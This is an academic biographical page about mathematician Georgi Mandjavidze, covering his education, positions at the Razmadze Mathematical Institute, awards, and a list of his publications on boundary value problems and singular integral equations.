35)\nTALUSES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nTALUSES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nTALUSES\n(50 = 15 + 35)\nSALUTES\n(50 = 15 + 35)\nSALUTES\n(50 = 15 + 35)\nTALUSES\n(50 = 15 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nTALUSES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nTALUSES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nTALUSES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nTALUSES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nSALUTES\n(44 = 9 + 35)\nTALUSES\n(44 = 9 + 
35)\nSALUTE\n(42)\nSALUTE\n(42)\nSAUTES\n(39)\nTASSEL\n(39)\nSTALES\n(39)\nTESLAS\n(39)\nTUSSLE\n(36)\nTUSSLE\n(36)\nTUSSLE\n(36)\nTUSSLE\n(36)\nSALUTE\n(36)\nSALUTE\n(36)\nTESLAS\n(33)\nTASSEL\n(33)\nTASSEL\n(33)\nLUTES\n(33)\nLUSTS\n(33)\nSTEALS\n(33)\nTESLAS\n(33)\nLUTES\n(33)\nLUSTS\n(33)\nSTEALS\n(33)\nSAUTES\n(33)\nSTEALS\n(33)\nTALUS\n(33)\nSTALES\n(33)\nSLATES\n(33)\nSAUTES\n(33)\nSLATES\n(33)\nSLATES\n(33)\nSTALES\n(33)\nTUSSLE\n(32)\nSALUTE\n(32)\nSALUTE\n(32)\nTUSSLE\n(32)\nSALUTE\n(30)\nTUSSLE\n(30)\nLASTS\n(30)\nSALUTE\n(30)\nSLATS\n(30)\nLEAST\n(30)\nLUST\n(30)\nSTALE\n(30)\nSETAL\n(30)\nSALUTE\n(30)\nSEALS\n(30)\nTUSSLE\n(30)\nLUTE\n(30)\nSALUTE\n(30)\nLEUS\n(30)\nTUSSLE\n(30)\nTUSSLE\n(30)\nSUETS\n(30)\nSTEAL\n(30)\nSLATE\n(30)\nTESLA\n(30)\nTEALS\n(30)\nSTEALS\n(28)\nSTALES\n(28)\nSTALES\n(28)\nTESLAS\n(28)\nLUSTS\n(28)\nTASSEL\n(28)\nTESLAS\n(28)\nSAUTES\n(28)\nSTEALS\n(28)\nTASSEL\n(28)\nSLATES\n(28)\nTALUS\n(28)\nLUTES\n(28)\nSLATES\n(28)\nSAUTES\n(28)\nSTALES\n(27)\nTALUS\n(27)\nTALUS\n(27)\nTALUS\n(27)\nLATE\n(27)\nLETS\n(27)\nSTEALS\n(27)\nSTEALS\n(27)\nLAST\n(27)\nSTALES\n(27)\nLEAS\n(27)\nSTALES\n(27)\n\nlute lutes\n\nlute salute\n\nresalutes" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84058064,"math_prob":1.000009,"size":1074,"snap":"2020-10-2020-16","text_gpt3_token_len":263,"char_repetition_ratio":0.13738318,"word_repetition_ratio":0.0,"special_character_ratio":0.22346368,"punctuation_ratio":0.12437811,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998456,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-20T15:34:15Z\",\"WARC-Record-ID\":\"<urn:uuid:771c6a22-5fb2-48e8-bab7-bc22cd8dc3ff>\",\"Content-Length\":\"147156\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d24d56dd-ff6d-43c4-8aa9-488f732e44ab>\",\"WARC-Concurrent-To\":\"<urn:uuid:5279a0b4-229c-4cd4-a42c-d56fa168f4da>\",\"WARC-IP-Address\":\"104.18.51.165\",\"WARC-Target-URI\":\"https://www.litscape.com/word_analysis/salutes\",\"WARC-Payload-Digest\":\"sha1:A2C5NQHLWVTILH7WUGXDI6D6WKITWC7O\",\"WARC-Block-Digest\":\"sha1:WPM3GXMSRGZ3PSCCS3EW3UO5W2AF4PPZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875144979.91_warc_CC-MAIN-20200220131529-20200220161529-00391.warc.gz\"}"}
https://documen.tv/question/find-the-distance-between-the-points-t-13-1-6-and-v-5-4-3-7-answer-in-simplest-eact-form-the-eac-28290909-50/
[ "# Find the distance between the points T(13, 1.6) and V(5.4, 3.7). Answer in simplest exact form. The exact distance between t\n\nQuestion\n\nFind the distance between the points T(13, 1.6) and V(5.4, 3.7). Answer in simplest exact form.\nThe exact distance between the two points is\n\nin progress 0\n4 weeks 2023-01-09T18:31:56+00:00 1 Answer 0 views 0\n\n1. The exact distance between the two points is 7.884795495 units.\nIn the question, we are asked to find the distance between the points T(13, 1.6) and V(5.4, 3.7).\nWe know that the between any two points A(x₁, y₁) and B(x₂, y₂) can be computed using the distance formula as:\nAB = √((x₂ – x₁)² + (y₂ – y₁)²).\nFrom the question, we take A(x₁, y₁) as T(13, 1.6) and B(x₂, y₂) as V(5.4, 3.7).\nThus, the distance between T and V can be shown as:\nTV = √((5.4 – 13)² + (3.7 – 1.6)²),\nor, TV = √((-7.6)² + (2.1)²),\nor, TV = √(57.76 + 4.41),\nor, TV = √(62.17),\nor, TV = 7.884795495.\nThus, The exact distance between the two points is 7.884795495 units." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79292935,"math_prob":0.99990416,"size":402,"snap":"2022-40-2023-06","text_gpt3_token_len":143,"char_repetition_ratio":0.15326633,"word_repetition_ratio":0.52459013,"special_character_ratio":0.39303482,"punctuation_ratio":0.1904762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997131,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-05T21:34:55Z\",\"WARC-Record-ID\":\"<urn:uuid:96a3343a-68ee-4f03-b6ce-e1a5b37cd51c>\",\"Content-Length\":\"94272\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:99cc33a7-37f9-473f-af7b-c5caf5d63548>\",\"WARC-Concurrent-To\":\"<urn:uuid:362dba40-1346-404b-9fca-95084eaf462b>\",\"WARC-IP-Address\":\"5.78.45.21\",\"WARC-Target-URI\":\"https://documen.tv/question/find-the-distance-between-the-points-t-13-1-6-and-v-5-4-3-7-answer-in-simplest-eact-form-the-eac-28290909-50/\",\"WARC-Payload-Digest\":\"sha1:HR5HEBKU523PSY46EHUVPHCRQH6N77PE\",\"WARC-Block-Digest\":\"sha1:I3DZIU2VB5IQYJVL6UWNJU3LZSZEBS4L\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500288.69_warc_CC-MAIN-20230205193202-20230205223202-00495.warc.gz\"}"}
https://www.isixsigma.com/dictionary/f-test/
[ "You often want to determine whether there is a difference in means between one, two or more groups of sample data. Likewise, you will also want to know about the variances between those groups. Let’s see how you can use the F test to do that.\n\n## Overview: What is the F test?\n\nThe F Test is a generic term for any test that uses the F-distribution. Typically you hear about the F-Test in the context of comparing variances, Analysis of Variance (ANOVA) and regression analysis. The name was coined by George W. Snedecor in honor of the famed mathematician and statistician, Sir Ronald Fisher. Fisher initially developed the statistic as the variance ratio in the 1920s.\n\nThe F test uses a ratio of the variances of your data groups. The null hypothesis (Ho) for the F test is that all variances are equal. If you wanted to determine whether one group of data came from the same population as another group, you would use the ratio of the larger variance over the smaller one. You would use the resulting F value and the F distribution to determine whether you could conclude the value of that ratio would allow you to reject the null hypothesis.\n\nWhen the F ratio value is small (close to 1), the value of the numerator is close to the value of the denominator and you cannot reject the null hypothesis. However, when the F ratio is sufficiently large, that is an indication the value of the numerator is substantially different than the denominator and you can reject the null.\n\n## An industry example of the F test\n\nThe company Six Sigma Black Belt (BB) was interested in whether the invoice processing time was reduced after some improvement activities. She used a 2-sample t-test to test the difference in the average processing time and found no statistically significant difference.\n\nShe then decided to see if there was an improvement in the variation of the processing time. You can see the results below. She was happy to see that variation had been reduced and processing time was now more predictable so the manager could do a better job planning the work.", null, "### What is the F test used for?\n\nThe F test is used to test the equality of population variances.\n\n### What is the difference between the F test, F ratio and F value?\n\nThe F test is used to test the difference between population variances. In ANOVA, the F ratio is the ratio of the variation between sample means and the variation within sample means. The F value is the resulting value from the F ratio and is used to determine whether to reject the null hypothesis.\n\n### What is the null hypothesis for the F test?\n\nThe null hypothesis is that all variances are equal. The alternative hypothesis is the variances are not equal." ]
[ null, "https://www.isixsigma.com/wp-content/uploads/2018/11/Screen-Shot-2022-06-23-at-1.16.32-PM.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95574915,"math_prob":0.9560521,"size":2719,"snap":"2023-40-2023-50","text_gpt3_token_len":564,"char_repetition_ratio":0.16169429,"word_repetition_ratio":0.03757829,"special_character_ratio":0.19970578,"punctuation_ratio":0.07575758,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9957334,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-01T06:12:09Z\",\"WARC-Record-ID\":\"<urn:uuid:dc00f803-1bf7-45eb-8cdf-dfa71d789564>\",\"Content-Length\":\"199863\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4aedb98d-3383-4155-90fb-8e025e11c60e>\",\"WARC-Concurrent-To\":\"<urn:uuid:68462215-44f9-4ed8-bdf6-dea5406131e9>\",\"WARC-IP-Address\":\"104.26.11.35\",\"WARC-Target-URI\":\"https://www.isixsigma.com/dictionary/f-test/\",\"WARC-Payload-Digest\":\"sha1:3JLD7WAJC5UJKKMPY53RFMGR5DOOLA45\",\"WARC-Block-Digest\":\"sha1:TUTAMZCERW2BAXE5XZ5SBBPYZ24D2NZT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510781.66_warc_CC-MAIN-20231001041719-20231001071719-00704.warc.gz\"}"}
https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/LHCb-PAPER-2011-003.html
[ "# Measurement of $J/\\psi$ production in $pp$ collisions at $\\sqrt{s}$ = 7 TeV\n\n[to restricted-access page]\n\n## Abstract\n\nThe production of J/psi mesons in proton-proton collisions at sqrt(s)=7 TeV is studied with the LHCb detector at the LHC. The differential cross-section for prompt J/psi production is measured as a function of the J/psi transverse momentum pT and rapidity y in the fiducial region 0<pT<14 GeV/c and 2.0<y<4.5. The differential cross-section and fraction of J/psi from b-hadron decays are also measured in the same pT and y ranges. The analysis is based on a data sample corresponding to an integrated luminosity of 5.2pb-1. The measured cross-sections integrated over the fiducial region are 10.52 +/- 0.04 +/- 1.40 +1.64/-2.20 mub for prompt J/psi production and 1.14 +/- 0.01 +/- 0.16 mub for J/psi from b-hadron decays, where the first uncertainty is statistical and the second systematic. The prompt J/psi production cross-section is obtained assuming no J/psi polarisation and the third error indicates the acceptance uncertainty due to this assumption.\n\n Dimuon mass distribution ({\\it left}) and $t_z$ distribution ({\\it right}), with fit results superimposed, for one bin ($3 < p_{\\rm T} <4 \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$, $2.5 ## Tables and captions Summary of systematic uncertainties. Table_1.pdf [54 KiB] HiDef png [183 KiB] Thumbnail [83 KiB] tex code", null, "Mean$ p_{\\rm T}$and RMS for$\\mathrm{prompt} J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$(assumed unpolarised) and$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu \\mathrm{from} b$. The first uncertainty is statistical, the second systematic and the third for$\\mathrm{prompt} J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$the uncertainty due to the unknown polarisation. Table_2.pdf [43 KiB] HiDef png [77 KiB] Thumbnail [25 KiB] tex code", null, "$\\frac{{\\rm d}\\sigma}{{\\rm d}y}$in nb for$\\mathrm{prompt} J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$(assumed unpolarised) and$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu \\mathrm{from} b$, integrated over$ p_{\\rm T}$. The first uncertainty is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_3.pdf [35 KiB] HiDef png [65 KiB] Thumbnail [34 KiB] tex code", null, "$\\frac{{\\rm d}^2\\sigma}{{\\rm d}p_{\\rm T}{\\rm d}y}$in nb/($ \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$) for prompt$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity, assuming no polarisation. The first error is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_4.pdf [38 KiB] HiDef png [126 KiB] Thumbnail [58 KiB] tex code", null, "$\\frac{{\\rm d}^2\\sigma}{{\\rm d}p_{\\rm T}{\\rm d}y}$in nb/($ \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$) for$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu \\mathrm{from} b$in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity. The first error is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. 
Table_5.pdf [38 KiB] HiDef png [115 KiB] Thumbnail [60 KiB] tex code", null, "$\\frac{{\\rm d}^2\\sigma}{{\\rm d}p_{\\rm T}{\\rm d}y}$in nb/($ \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$) for prompt$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity, assuming fully transversely polarised$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$. The first error is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_6.pdf [38 KiB] HiDef png [126 KiB] Thumbnail [58 KiB] tex code", null, "$\\frac{{\\rm d}^2\\sigma}{{\\rm d}p_{\\rm T}{\\rm d}y}$in nb/($ \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$) for prompt$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity, assuming fully longitudinally polarised$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$. The first error is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_7.pdf [38 KiB] HiDef png [122 KiB] Thumbnail [60 KiB] tex code", null, "Fraction of$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu \\mathrm{from} b$(in %) in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity. The first uncertainty is statistical, the second systematic (uncorrelated between bins) and the third is the uncertainty due to the unknown polarisation of the$\\mathrm{prompt} J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$; the central values are for unpolarised$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu\\$ . Table_8.pdf [39 KiB] HiDef png [148 KiB] Thumbnail [66 KiB] tex code", null, "Created on 20 August 2019.Citation count from INSPIRE on 23 August 2019." ]
[ null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_1.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_2.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_3.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_4.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_5.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_6.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_7.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_8.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5938359,"math_prob":0.99549127,"size":9162,"snap":"2019-35-2019-39","text_gpt3_token_len":3058,"char_repetition_ratio":0.2332387,"word_repetition_ratio":0.42316258,"special_character_ratio":0.31346866,"punctuation_ratio":0.085178874,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964356,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-24T11:47:24Z\",\"WARC-Record-ID\":\"<urn:uuid:83645113-6696-4965-96df-7cf3f79282f3>\",\"Content-Length\":\"24487\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:40a257bf-f662-4e06-b4c8-d924e97a4a88>\",\"WARC-Concurrent-To\":\"<urn:uuid:b30d0ac7-a378-4631-97aa-b2194712be4f>\",\"WARC-IP-Address\":\"137.138.150.3\",\"WARC-Target-URI\":\"https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/LHCb-PAPER-2011-003.html\",\"WARC-Payload-Digest\":\"sha1:QMFIEZRMXVR74U5WEIQRWUZE7LXXHBXK\",\"WARC-Block-Digest\":\"sha1:JIUCGIAEY6YERJSSKBIA5XD6GYPZP6AE\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027320734.85_warc_CC-MAIN-20190824105853-20190824131853-00324.warc.gz\"}"}
http://lists.openscad.org/pipermail/discuss_lists.openscad.org/2016-June/019242.html
[ "# [OpenSCAD] mixing 2D and 3D\n\njon jon at jonbondy.com\nSat Jun 25 17:58:16 EDT 2016\n\n```I'm playing around with moldings. I thought I was careful to keep all\nof the 2D stuff together and all of the 3D stuff together, but I guess I\nwas wrong.\n\n1) if I do a hull() on 2D objects, don't I get a 2D object as a result?\n\n2) can a module() return a 2D object?\n\n3) sure would be nice if the error messages gave even a HINT about where\n\nThanks\n\nJon\n\n---\n\n\\$fn = 100;\neps = 0.1;\n\nmodule RoundedSquare(x, y) {\nhull() {\ntranslate([0, 1]) square(1);\ntranslate([x-4, y-4]) circle(4);\ntranslate([x-1, 1]) square(1);\ntranslate([0, y-1]) square(1);\n}\n}\n\nmodule CrossSection1()\ndifference() {\nunion() {\nsquare([10, 20]);\ntranslate([10, 3])\ncircle(2);\n}\ntranslate([10, 15])\ncircle(2);\n}\n\nCrossSection1();\n\ntranslate([0, 30, 0])\nCrossSection2();\n\nmodule CrossSection2()\ndifference() {\nunion() {\nRoundedSquare(10, 20);\ntranslate([10, 12])\ncircle(2);\n}\ntranslate([10, 5])\ncircle(2);\n}\n\ntranslate([80, 0, 0])\nrotate([0, -90, 0])\nlinear_extrude(height = 50)\nCrossSection1();\n\ntranslate([80, 30, 0])\nrotate([0, -90, 0])\nlinear_extrude(height = 50)\nCrossSection2();\n\ndifference() {\ntranslate([-50, 50 + 15, 0])\nrotate([0, -90, 90])\nlinear_extrude(height = 50)\nCrossSection2();\ntranslate([-50, 0, -eps])\nrotate([0, -90, 0])\nlinear_extrude(height = 50)\nCrossSection2();\n}\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6824252,"math_prob":0.99260515,"size":1435,"snap":"2020-10-2020-16","text_gpt3_token_len":489,"char_repetition_ratio":0.17679945,"word_repetition_ratio":0.046511628,"special_character_ratio":0.40209058,"punctuation_ratio":0.19932432,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96871406,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-08T06:00:19Z\",\"WARC-Record-ID\":\"<urn:uuid:c80172cd-abeb-44e4-b089-0e2821a3cd58>\",\"Content-Length\":\"4348\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0a66cddd-a521-43ba-83d3-a609749c679f>\",\"WARC-Concurrent-To\":\"<urn:uuid:c03ece7c-7002-4f1a-9c46-b4cd0b3f9320>\",\"WARC-IP-Address\":\"172.104.30.75\",\"WARC-Target-URI\":\"http://lists.openscad.org/pipermail/discuss_lists.openscad.org/2016-June/019242.html\",\"WARC-Payload-Digest\":\"sha1:PUFJ3J6SJYKIU4YGG7Y42GPJFDAYDCWL\",\"WARC-Block-Digest\":\"sha1:LUQLVAXZ3GO3DTRDBLAHZARKF4NM4WOG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371810617.95_warc_CC-MAIN-20200408041431-20200408071931-00416.warc.gz\"}"}
http://www.rmi.ge/person/manjavidze/
[ "", null, "# Professor Georgi Mandjavidze\n\n## (6.V.1924 - 13.IV.1999)\n\nEDUCATION AND SCIENTIFIC DEGREES\n\n 1931 - 1941 Pupil of Zestafoni Secondary School 1942 - 1947 Student of Tbilisi State University Faculty of Mechanics and Mathematics 1947 - 1950 Post-Graduate Student of A.Razmadze Mathematical Institute of the Georgian Academy of Sciences 1951 Cand. (Phys. & Math.), Tbilisi State University 1970 Dr. Sci. (Phys. & Math.), Tbilisi State University 1991 Full Professor Tbilisi State University\n\nPOSITIONS HELD AND ACADEMIC EXPERIENCE\n\n 1950 - 1954 Scientific secretary of the A. Razmadze Mathematical Institute of the Georgian Academy of Sciences 1954 - 1977 The deputy director of A. Razmadze Mathematical Institute of the Georgian Academy of Sciences 1983 - 1999 Head of the Department of Theory of Complex Analysis and its Application\n\nRESEARCH INTERESTS\n\nBoundary value problems of the theory of functions of a complex variable, Singular Integral Equations\n\nPRIZES and AWARDS\n\n 1966 Medal for Distinction in Labour 1970 Jubilee Medal 1991 N. Muskhelishvili's Prize for the monograph \"Boundary Value Problems of Conjugation with Displacement for Analytic and Generalized Functions\", Tbilisi Univ. Press, 1990, 176 p.\n\nMAIN PUBLICATIONS\n\n(i) Monographs\n\n1. Boundary Value Problems of Conjugation with Displacement for Analytic and Generalized Functions, Tbilisi Univ. Press, 1990, 176 p.\n\n(ii) Papers\n\n2. On one class of singular integral equations with discontinuous coefficients. (Russian) Soobshch. AN GSSR, 11(1950), No. 5, 269-274.\n3. On one system of singular integral equations with discontinuous coefficients. (Russian) Soobshch. AN GSSR, 11(1950), No.6, 350-360.\n4. On one singular integral equation with discontinuous coefficients and its application to the theory of elasticity. (Russian) Prikladn. Matem. i Mekh., 15(1951), No.3, 351-356.\n5. On an approximate solution of boundary value problems of the theory of functions of a complex variable. (Russian) Soobshch. AN GSSR, 14(1953), No.10, 577-582.\n6. On an approximate solution of boundary value problems of the theory of analytic functions. Proc. of the III All-Union Mathem. Forum, I(1956), p.88.\n7. On the Riemann-Privalov problem with continuous coefficients (with G. Akhalaia). (Russian) DAN SSSR, 123(1958), No.5, 791-794.\n8. An approximate solution of boundary value problems of the theory of analytic functions. In: \"Investigations in modern problems of the theory of functions of a complex variable\" by A.I. Markushevich. Moscow, 1960, 365-380.\n9. Mathematical and natural sciences, mathematics and mechanics (with G. Chogoshvili). In: \"Science in the Soviet Georgia for 40 years\". Acad. of Sciences of the Georgian SSR, Tbilisi, 1961.\n10. On the problem of linear conjugation and singular integral equations with a Cauchy kernel with continuous coefficients (with B. Khvedelidze). Trudy Tbiliss. Mat. Inst. 28(1962), 85-105.\n11. Methods of the theory of analytic functions in some statical problems of elasticity (with A. Kalandia). The II All-Union Congress in the Theoretical and Applied Mechanics. Annotations of reports. Moscow, 1964, 99-100.\n12. Singular integral equations as a tool of solving the mixed problems of the theory of elasticity. Proc. of International Symposium (Tbilisi, 1963). Moscow, 1(1965), 237-247.\n13. Problem of linear conjugation in the plane theory of elasticity. Conference in Mechanics. Annotations of reports. Bucharest, 1965, p.304.\n14. 
On boundary value problems of linear conjugation with displacement. International Congress of Mathematicians. Theses of Reports. Moscow, 7(1965), p.43.\n15. Review of works in the theory of elasticity (with G. Barenblat, A. Kalandia). In: \"Some Basic Problems of the Mathematical Theory of Elasticity\" by N.I. Muskhelishvili, Ch. VIII, Nauka, Moscow, 1966.\n16. Boundary value problems of linear conjugation of general type with displacements. Trudy Tbiliss. Mat. Inst. 33(1967), 76-81.\n17. Boundary value problems of linear conjugation with a displacement and its connection with the theory of generalized analytic functions. Trudy Tbiliss. Mat. Inst. 33(1967), 82-87.\n18. On the behaviour of the boundary value problem of linear conjugation. Trudy Tbiliss. Mat. Inst. 35(1969), 173-182.\n19. One-dimensional singular integral equations (with B. Khvedelidze). History of Home Mathematics. Akad. Nauk SSSR i Akad. Nauk Ukr.SSR, 4(1970), I, 774-786.\n20. Boundary value problems of linear conjugation and some of their applications. Thesis of Dissertation submitted for doctor's degree (Phys., Math.), TBilisi State University, 1970.\n21. On the behaviour of derivative solutions of systems of singular integral equations and boundary value problems of the theory of analytic functions. Congress Int. des Mathematicians, Nice, Les 265 Communications Individualles, p. 192.\n22. Statement and methods of the solution of problems of the plane theory of elasticity; basic results of investigation of the plane theory of elasticity (with A. Kalandia). In: Mechanics in the USSR for 50 years\", 3(1972), Moscow.\n23. Boundary value problems of linear conjugation with piecewise continuous matrix coefficients. \"Continuum Mechanics and Related Problems of Analysis\", (Collection of works, dedicated to the 30th Birthday Anniversary of Academician N. I. Muskhelishvili), Nauka, Moscow, 1972.\n24. On the reduction of the boundary value problem of linear conjugation with a displacement to the problem of linear conjugation. DAN SSSR, 234(1977), No.4, 758-760.\n25. On the application of the theory of generalized analytic functions to the boundary problem of conjugation with a displacement. DAN SSSR, 237(1977), No.4, 1285-1289.\n26. On one family of boundary value problems of linear conjugation. (Russian) Soobshch. Akad. Nauk GSSR, 95(1979), No.2, 289-292.\n27. Application of the theory of generalized analytic functions to the investigation of boundary value problems of linear conjugation with displacement. In: Differential integral equations, boundary value problems. (Collection of works dedicated to the memory of I.N. Vekua), Tbilisi State University, 1979.\n28. On some families of boundary value problems of linear conjugation. Reports of Seminar of I. Vekua Inst. of Appl. Math., Tbilisi, 1980, No. 14.\n29. Academician N.I. Muskhelishvili. Society \"Znanie\", GSSR, Tbilisi, 1981.\n30. Application of methods of the theory of generalized analytic functions to the boundary value problems of linear conjugation with displacement. All-Union Symposium in Partial Differential Equations and Their Applications. Annotations of reports, Tbilisi, 1982, p. 13.\n31. On one class of boundary value problems of linear conjugation. (Russian) Soobshch. AN GSSR, 105(1982), No. 3, 493-496.\n32. On some boundary value problems for nonlinear differential systems of the first order on the plane. In: Boundary value problems of the theory of generalized analytic functions and their applications. Inst. of Appl. Math. Tbiliss. State Univ., 1983.\n33. 
